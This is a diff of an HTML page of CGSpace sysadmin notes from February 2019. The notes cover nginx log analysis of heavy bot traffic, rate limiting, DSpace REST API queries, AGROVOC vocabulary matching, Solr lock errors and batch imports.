@ -834,7 +834,7 @@ UPDATE 1
<li>Jesus fucking Christ, Linode sent an alert that CGSpace (linode18) was using 421% CPU for a few hours this afternoon (server time):</li>
<li>There seems to have been a lot of activity in XMLUI:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1236 18.212.208.240
1276 54.164.83.99
1277 3.83.14.11
@ -845,7 +845,7 @@ UPDATE 1
1327 52.54.252.47
1477 5.9.6.51
1861 94.71.244.172
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
8 42.112.238.64
9 121.52.152.3
9 157.55.39.50
@ -856,15 +856,15 @@ UPDATE 1
28 66.249.66.219
43 34.209.213.122
178 50.116.102.77
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
2727
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
186
</code></pre><ul>
<li>94.71.244.172 is in Greece and uses the user agent &ldquo;Indy Library&rdquo;</li>
<li>At least they are re-using their Tomcat session:</li>
</ul>
<pre><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172' dspace.log.2019-02-18 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172&#39; dspace.log.2019-02-18 | sort | uniq | wc -l
</code></pre><ul>
<li>
<p>The following IPs were all hitting the server hard simultaneously and are located on Amazon and use the user agent &ldquo;Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0&rdquo;:</p>
@ -886,7 +886,7 @@ UPDATE 1
<p>For reference most of these IPs hitting the XMLUI this afternoon are on Amazon:</p>
</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 30
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 30
1173 52.91.249.23
1176 107.22.118.106
1178 3.88.173.152
@ -920,7 +920,7 @@ UPDATE 1
</code></pre><ul>
<li>In the case of 52.54.252.47 they are only making about 10 requests per minute during this time (albeit from dozens of concurrent IPs):</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E '18/Feb/2019:1[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E &#39;18/Feb/2019:1[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 10
10 18/Feb/2019:17:20
10 18/Feb/2019:17:22
10 18/Feb/2019:17:31
@ -935,7 +935,7 @@ UPDATE 1
<li>As this user agent is not recognized as a bot by DSpace this will definitely fuck up the usage statistics</li>
<li>There were 92,000 requests from these IPs alone today!</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c &#39;Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0&#39;
92756
</code></pre><ul>
<li>I will add this user agent to the <a href="https://github.com/ilri/rmg-ansible-public/blob/master/roles/dspace/templates/nginx/default.conf.j2">&ldquo;badbots&rdquo; rate limiting in our nginx configuration</a></li>
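<li>Once that is deployed, a rough way to check that the rate limit actually kicks in for this user agent is to replay a burst of requests against DSpace Test and watch the status codes (the hostname and handle here are only examples):</li>
</ul>
<pre tabindex="0"><code>$ for i in $(seq 1 30); do curl -s -o /dev/null -w &#39;%{http_code}\n&#39; -A &#39;Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0&#39; &#39;https://dspacetest.cgiar.org/handle/10568/1&#39;; done | sort | uniq -c
</code></pre><ul>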
@ -943,7 +943,7 @@ UPDATE 1
<li>IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary</li>
<li>I will merge them with our existing list and then resolve their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2019-02-18-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2019-02-18-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2019-02-18-combined-orcids.txt -o /tmp/2019-02-18-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -956,7 +956,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>Unfortunately, I don&rsquo;t see any strange activity in the web server API or XMLUI logs at that time in particular</li>
<li>So far today the top ten IPs in the XMLUI logs are:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;19/Feb/2019:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;19/Feb/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
11541 18.212.208.240
11560 3.81.136.184
11562 3.88.237.84
@ -978,7 +978,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</li>
<li>The top requests in the API logs today are:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;19/Feb/2019:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;19/Feb/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
42 66.249.66.221
44 156.156.81.215
55 3.85.54.129
@ -999,17 +999,17 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I need to follow up with the DSpace developers and Atmire to see how they classify which requests are bots so we can try to estimate the impact caused by these users and perhaps try to update the list to make the stats more accurate</li>
<li>I found one IP address in Nigeria that has an Android user agent and has requested a bitstream from <a href="https://hdl.handle.net/10568/96140">10568/96140</a> almost 200 times:</li>
</ul>
<pre><code># grep 41.190.30.105 /var/log/nginx/access.log | grep -c 'acgg_progress_report.pdf'
<pre tabindex="0"><code># grep 41.190.30.105 /var/log/nginx/access.log | grep -c &#39;acgg_progress_report.pdf&#39;
185
</code></pre><ul>
<li>Wow, and another IP in Nigeria made a bunch more yesterday from the same user agent:</li>
</ul>
<pre><code># grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c 'acgg_progress_report.pdf'
<pre tabindex="0"><code># grep 41.190.3.229 /var/log/nginx/access.log.1 | grep -c &#39;acgg_progress_report.pdf&#39;
346
</code></pre><ul>
<li>In the last two days alone there were 1,000 requests for this PDF, mostly from Nigeria!</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v 'upstream response is buffered' | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep acgg_progress_report.pdf | grep -v &#39;upstream response is buffered&#39; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1 139.162.146.60
1 157.55.39.159
1 196.188.127.94
@ -1032,7 +1032,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</code></pre><ul>
<li>That is so weird, they are all using this Android user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Linux; Android 7.0; TECNO Camon CX Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
<pre tabindex="0"><code>Mozilla/5.0 (Linux; Android 7.0; TECNO Camon CX Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
</code></pre><ul>
<li>I wrote a quick and dirty Python script called <code>resolve-addresses.py</code> to resolve IP addresses to their owning organization&rsquo;s name, ASN, and country using the <a href="https://ipapi.co">IPAPI.co API</a></li>
</ul>
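<ul>
<li>For reference, the underlying IPAPI.co lookup is just an HTTP call, for example with one of the Nigerian IPs from above (the script itself decides which of the returned fields to keep):</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;https://ipapi.co/41.190.30.105/json/&#39;
</code></pre>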
@ -1042,9 +1042,9 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I told him that they should probably try to use the REST API&rsquo;s <code>find-by-metadata-field</code> endpoint</li>
<li>The annoying thing is that you have to match the text language attribute of the field exactly, but it does work:</li>
</ul>
<pre><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.creator.id&quot;,&quot;value&quot;: &quot;Alan S. Orth: 0000-0002-1735-7458&quot;, &quot;language&quot;: &quot;&quot;}'
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.creator.id&quot;,&quot;value&quot;: &quot;Alan S. Orth: 0000-0002-1735-7458&quot;, &quot;language&quot;: null}'
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.creator.id&quot;,&quot;value&quot;: &quot;Alan S. Orth: 0000-0002-1735-7458&quot;, &quot;language&quot;: &quot;en_US&quot;}'
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: &#34;&#34;}&#39;
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: null}&#39;
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;https://cgspace.cgiar.org/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.creator.id&#34;,&#34;value&#34;: &#34;Alan S. Orth: 0000-0002-1735-7458&#34;, &#34;language&#34;: &#34;en_US&#34;}&#39;
</code></pre><ul>
<li>This returns six items for me, which is the <a href="https://cgspace.cgiar.org/discover?filtertype_1=orcid&amp;filter_relational_operator_1=contains&amp;filter_1=Alan+S.+Orth%3A+0000-0002-1735-7458&amp;submit_apply_filter=&amp;query=">same I see in a Discovery search</a></li>
<li>Hector Tobon from CIAT asked if it was possible to get item statistics from CGSpace so I told him to use my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a></li>
@ -1063,23 +1063,23 @@ $ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: applica
<li>It allows specifying the language the term should be queried in as well as output files to save the matched and unmatched terms to</li>
<li>I ran our top 1500 subjects through English, Spanish, and French and saved the matched and unmatched terms to separate files:</li>
</ul>
<pre><code>$ ./agrovoc-lookup.py -l en -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-en.txt -or /tmp/rejected-subjects-en.txt
<pre tabindex="0"><code>$ ./agrovoc-lookup.py -l en -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-en.txt -or /tmp/rejected-subjects-en.txt
$ ./agrovoc-lookup.py -l es -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-es.txt -or /tmp/rejected-subjects-es.txt
$ ./agrovoc-lookup.py -l fr -i /tmp/top-1500-subjects.txt -om /tmp/matched-subjects-fr.txt -or /tmp/rejected-subjects-fr.txt
</code></pre><ul>
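<li>This is presumably the same AGROVOC REST API that the Jython snippet further down uses, so a single term can also be checked by hand, for example:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=SOIL&amp;lang=en&#39;
</code></pre><ul>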
<li>Then I generated a list of all the unique matched terms:</li>
</ul>
<pre><code>$ cat /tmp/matched-subjects-* | sort | uniq &gt; /tmp/2019-02-21-matched-subjects.txt
<pre tabindex="0"><code>$ cat /tmp/matched-subjects-* | sort | uniq &gt; /tmp/2019-02-21-matched-subjects.txt
</code></pre><ul>
<li>And then a list of all the unique <em>unmatched</em> terms using some utility I&rsquo;ve never heard of before called <code>comm</code> (where <code>-13</code> prints only the lines unique to the second file), or with <code>diff</code>:</li>
</ul>
<pre><code>$ sort /tmp/top-1500-subjects.txt &gt; /tmp/subjects-sorted.txt
<pre tabindex="0"><code>$ sort /tmp/top-1500-subjects.txt &gt; /tmp/subjects-sorted.txt
$ comm -13 /tmp/2019-02-21-matched-subjects.txt /tmp/subjects-sorted.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
$ diff --new-line-format=&quot;&quot; --unchanged-line-format=&quot;&quot; /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
$ diff --new-line-format=&#34;&#34; --unchanged-line-format=&#34;&#34; /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
</code></pre><ul>
<li>Generate a list of countries and regions from CGSpace for Sisay to look through:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 228 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/2019-02-21-countries.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 228 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/2019-02-21-countries.csv WITH CSV HEADER;
COPY 202
dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = 227 AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC) to /tmp/2019-02-21-regions.csv WITH CSV HEADER;
COPY 33
@ -1124,20 +1124,20 @@ COPY 33
<p>I figured out how to query AGROVOC from OpenRefine using Jython by creating a custom text facet:</p>
</li>
</ul>
<pre><code>import json
<pre tabindex="0"><code>import json
import re
import urllib
import urllib2
pattern = re.compile('^S[A-Z ]+$')
pattern = re.compile(&#39;^S[A-Z ]+$&#39;)
if pattern.match(value):
url = 'http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=' + urllib.quote_plus(value) + '&amp;lang=en'
url = &#39;http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=&#39; + urllib.quote_plus(value) + &#39;&amp;lang=en&#39;
get = urllib2.urlopen(url)
data = json.load(get)
if len(data['results']) == 1:
return &quot;matched&quot;
if len(data[&#39;results&#39;]) == 1:
return &#34;matched&#34;
return &quot;unmatched&quot;
return &#34;unmatched&#34;
</code></pre><ul>
<li>You have to make sure to URL encode the value with <code>quote_plus()</code> and it totally works, but it seems to refresh the facets (and therefore re-query everything) when you select a facet so that makes it basically unusable</li>
<li>There is a <a href="https://programminghistorian.org/en/lessons/fetch-and-parse-data-with-openrefine#example-2-url-queries-and-parsing-json">good resource discussing OpenRefine, Jython, and web scraping</a></li>
@ -1148,16 +1148,16 @@ return &quot;unmatched&quot;
<li>I&rsquo;m not sure how to deal with terms like &ldquo;CORN&rdquo; that are alternative labels (<code>altLabel</code>) in AGROVOC where the preferred label (<code>prefLabel</code>) would be &ldquo;MAIZE&rdquo;</li>
<li>For example, <a href="http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=CORN*&amp;lang=en">a query</a> for <code>CORN*</code> returns:</li>
</ul>
<pre><code> &quot;results&quot;: [
<pre tabindex="0"><code> &#34;results&#34;: [
{
&quot;altLabel&quot;: &quot;corn (maize)&quot;,
&quot;lang&quot;: &quot;en&quot;,
&quot;prefLabel&quot;: &quot;maize&quot;,
&quot;type&quot;: [
&quot;skos:Concept&quot;
&#34;altLabel&#34;: &#34;corn (maize)&#34;,
&#34;lang&#34;: &#34;en&#34;,
&#34;prefLabel&#34;: &#34;maize&#34;,
&#34;type&#34;: [
&#34;skos:Concept&#34;
],
&quot;uri&quot;: &quot;http://aims.fao.org/aos/agrovoc/c_12332&quot;,
&quot;vocab&quot;: &quot;agrovoc&quot;
&#34;uri&#34;: &#34;http://aims.fao.org/aos/agrovoc/c_12332&#34;,
&#34;vocab&#34;: &#34;agrovoc&#34;
},
</code></pre><ul>
<li>There are dozens of other entries like &ldquo;corn (soft wheat)&rdquo;, &ldquo;corn (zea)&rdquo;, &ldquo;corn bran&rdquo;, &ldquo;Cornales&rdquo;, etc. that could potentially match, and determining whether they are related programmatically is difficult</li>
@ -1176,7 +1176,7 @@ return &quot;unmatched&quot;
<li>There seems to be something going on with Solr on CGSpace (linode18) because statistics on communities and collections are blank for January and February this year</li>
<li>I see some errors started recently in Solr (yesterday):</li>
</ul>
<pre><code>$ grep -c ERROR /home/cgspace.cgiar.org/log/solr.log.2019-02-*
<pre tabindex="0"><code>$ grep -c ERROR /home/cgspace.cgiar.org/log/solr.log.2019-02-*
/home/cgspace.cgiar.org/log/solr.log.2019-02-11.xz:0
/home/cgspace.cgiar.org/log/solr.log.2019-02-12.xz:0
/home/cgspace.cgiar.org/log/solr.log.2019-02-13.xz:0
@ -1195,7 +1195,7 @@ return &quot;unmatched&quot;
<li>But I don&rsquo;t see anything interesting in yesterday&rsquo;s Solr log&hellip;</li>
<li>I see this in the Tomcat 7 logs yesterday:</li>
</ul>
<pre><code>Feb 25 21:09:29 linode18 tomcat7[1015]: Error while updating
<pre tabindex="0"><code>Feb 25 21:09:29 linode18 tomcat7[1015]: Error while updating
Feb 25 21:09:29 linode18 tomcat7[1015]: java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp
Feb 25 21:09:29 linode18 tomcat7[1015]: at org.dspace.statistics.SolrLogger$9.visit(SourceFile:1241)
Feb 25 21:09:29 linode18 tomcat7[1015]: at org.dspace.statistics.SolrLogger.visitEachStatisticShard(SourceFile:268)
@ -1207,7 +1207,7 @@ Feb 25 21:09:29 linode18 tomcat7[1015]: at org.dspace.statistics.Statist
<li>In the Solr admin GUI I see we have the following error: &ldquo;statistics-2011: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher&rdquo;</li>
<li>I restarted Tomcat and upon startup I see lots of errors in the systemd journal, like:</li>
</ul>
<pre><code>Feb 25 21:37:49 linode18 tomcat7[28363]: SEVERE: IOException while loading persisted sessions: java.io.StreamCorruptedException: invalid type code: 00
<pre tabindex="0"><code>Feb 25 21:37:49 linode18 tomcat7[28363]: SEVERE: IOException while loading persisted sessions: java.io.StreamCorruptedException: invalid type code: 00
Feb 25 21:37:49 linode18 tomcat7[28363]: java.io.StreamCorruptedException: invalid type code: 00
Feb 25 21:37:49 linode18 tomcat7[28363]: at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1601)
Feb 25 21:37:49 linode18 tomcat7[28363]: at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:2287)
@ -1220,7 +1220,7 @@ Feb 25 21:37:49 linode18 tomcat7[28363]: at sun.reflect.NativeMethodAcce
<li>Also, now the Solr admin UI says &ldquo;statistics-2015: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher&rdquo;</li>
<li>In the Solr log I see:</li>
</ul>
<pre><code>2019-02-25 21:38:14,246 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2015]: Error opening new searcher
<pre tabindex="0"><code>2019-02-25 21:38:14,246 ERROR org.apache.solr.core.CoreContainer @ Error creating core [statistics-2015]: Error opening new searcher
org.apache.solr.common.SolrException: Error opening new searcher
at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:873)
at org.apache.solr.core.SolrCore.&lt;init&gt;(SolrCore.java:646)
@ -1239,12 +1239,12 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
... 33 more
2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2015': Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2015&#39;: Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
</code></pre><ul>
<li>I tried to shutdown Tomcat and remove the locks:</li>
</ul>
<pre><code># systemctl stop tomcat7
# find /home/cgspace.cgiar.org/solr -iname &quot;*.lock&quot; -delete
<pre tabindex="0"><code># systemctl stop tomcat7
# find /home/cgspace.cgiar.org/solr -iname &#34;*.lock&#34; -delete
# systemctl start tomcat7
</code></pre><ul>
<li>&hellip; but the problem still occurs</li>
@ -1254,7 +1254,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<li>I did some tests with calling a shell script from systemd on DSpace Test (linode19) and the <code>LimitAS</code> setting does work, and the <code>infinity</code> setting in systemd does get translated to &ldquo;unlimited&rdquo; on the service</li>
<li>I thought it might be open file limit, but it seems we&rsquo;re nowhere near the current limit of 16384:</li>
</ul>
<pre><code># lsof -u dspace | wc -l
<pre tabindex="0"><code># lsof -u dspace | wc -l
3016
</code></pre><ul>
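<li>For completeness, the address space limit that systemd actually applied can also be checked from the shell; a quick sketch (unit name assumed, second line is illustrative output):</li>
</ul>
<pre tabindex="0"><code># systemctl show -p LimitAS tomcat7
LimitAS=infinity
# grep 'Max address space' /proc/$(pgrep -of tomcat7)/limits
</code></pre><ul>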
<li>For what it&rsquo;s worth I see the same errors about <code>solr_update_time_stamp</code> on DSpace Test (linode19)</li>
@ -1270,7 +1270,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<li>I sent a mail to the dspace-tech mailing list about the &ldquo;solr_update_time_stamp&rdquo; error</li>
<li>A CCAFS user sent a message saying they got this error when submitting to CGSpace:</li>
</ul>
<pre><code>Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1021 by user 3049
<pre tabindex="0"><code>Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1021 by user 3049
</code></pre><ul>
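<li>For reference, the offending collection can be checked directly from the command line via the REST API; a minimal sketch (Accept header and pretty-printing assumed):</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H 'Accept: application/json' 'https://cgspace.cgiar.org/rest/collections/1021' | python -m json.tool
</code></pre><ul>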
<li>According to the <a href="https://cgspace.cgiar.org/rest/collections/1021">REST API</a> collection 1021 appears to be <a href="https://cgspace.cgiar.org/handle/10568/66581">CCAFS Tools, Maps, Datasets and Models</a></li>
<li>I looked at the <code>WORKFLOW_STEP_1</code> (Accept/Reject) and the group is of course empty</li>
@ -1287,7 +1287,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<li>He asked me to upload the files for him via the command line, but the file he referenced (<code>Thumbnails_feb_2019.zip</code>) doesn&rsquo;t exist</li>
<li>I noticed that the command line batch import functionality is a bit weird when using zip files because you have to specify the directory where the zip file is located as well as the zip file&rsquo;s name:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace import -a -e aorth@stfu.com -m mapfile -s /home/aorth/Downloads/2019-02-27-test/ -z SimpleArchiveFormat.zip
<pre tabindex="0"><code>$ ~/dspace/bin/dspace import -a -e aorth@stfu.com -m mapfile -s /home/aorth/Downloads/2019-02-27-test/ -z SimpleArchiveFormat.zip
</code></pre><ul>
<li>Why don&rsquo;t they just derive the directory from the path to the zip file?</li>
<li>Working on Udana&rsquo;s Restoring Degraded Landscapes (RDL) WLE records that we originally started in 2018-11 and fixing many of the same problems that I originally did then
@ -1303,12 +1303,12 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
<ul>
<li>I helped Sisay upload the nineteen CTA records from last week via the command line because they required mappings (which is not possible to do via the batch upload web interface)</li>
</ul>
<pre><code>$ dspace import -a -e swebshet@stfu.org -s /home/swebshet/Thumbnails_feb_2019 -m 2019-02-28-CTA-Thumbnails.map
<pre tabindex="0"><code>$ dspace import -a -e swebshet@stfu.org -s /home/swebshet/Thumbnails_feb_2019 -m 2019-02-28-CTA-Thumbnails.map
</code></pre><ul>
<li>Mails from CGSpace stopped working, looks like ICT changed the password again or we got locked out <em>sigh</em></li>
<li>Now I&rsquo;m getting this message when trying to use DSpace&rsquo;s <code>test-email</code> script:</li>
</ul>
<pre><code>$ dspace test-email
<pre tabindex="0"><code>$ dspace test-email
About to send test email:
- To: stfu@google.com
@ -1344,15 +1344,15 @@ Please see the DSpace documentation for assistance.
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -46,7 +46,7 @@ Most worryingly, there are encoding errors in the abstracts for eleven items, fo
I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -76,12 +76,12 @@ I think I will need to ask Udana to re-copy and paste the abstracts with more ca
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
